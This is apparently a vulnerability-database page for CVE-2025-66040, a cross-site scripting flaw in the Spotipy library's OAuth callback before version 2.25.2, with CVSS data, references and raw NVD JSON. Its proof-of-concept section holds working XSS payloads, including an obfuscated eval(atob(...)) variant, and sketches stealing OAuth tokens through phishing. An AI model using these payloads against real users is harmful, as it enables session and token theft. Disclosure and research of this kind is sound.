CVE-2025-66040

Description

Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2.

CVSS Details

CVSS Score

3.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Spotipy < 2.25.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-66040 PoC - XSS in Spotipy OAuth callback
# This PoC demonstrates the XSS vulnerability in Spotipy < 2.25.2

# Malicious OAuth callback URL with XSS payload in error parameter
xss_payload = "<script>alert(document.cookie)</script>"
encoded_payload = urllib.parse.quote(xss_payload)

# Construct malicious callback URL
malicious_url = f"http://localhost:8888/callback?error={encoded_payload}"

# Alternative payload variants:
# 1. Event handler based XSS:
payload2 = "<img src=x onerror=alert(document.domain)>"
# 2. DOM manipulation:
payload3 = "<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>"

print(f"Malicious OAuth callback URL: {malicious_url}")
print(f"Decoded payload: {xss_payload}")

# When the vulnerable Spotipy server processes this callback:
# 1. It receives the error parameter with XSS payload
# 2. Without sanitization, it renders: <p>Error: <script>alert(document.cookie)</script></p>
# 3. Browser executes the injected JavaScript

# Exploitation scenario:
# 1. Attacker creates a phishing OAuth link with redirect_uri pointing to target
# 2. Victim clicks the link and completes Spotify authentication
# 3. Callback includes malicious error parameter
# 4. Victim's browser executes XSS payload
# 5. Attacker steals OAuth tokens or session data

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66040
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66040
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66040/
[4] VulDB https://vuldb.com/cve/CVE-2025-66040
[5] https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767
[6] https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66040", "sourceIdentifier": "[email protected]", "published": "2025-11-27T00:15:55.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.6, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767", "source": "[email protected]"}, {"url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm", "source": "[email protected]"}]}}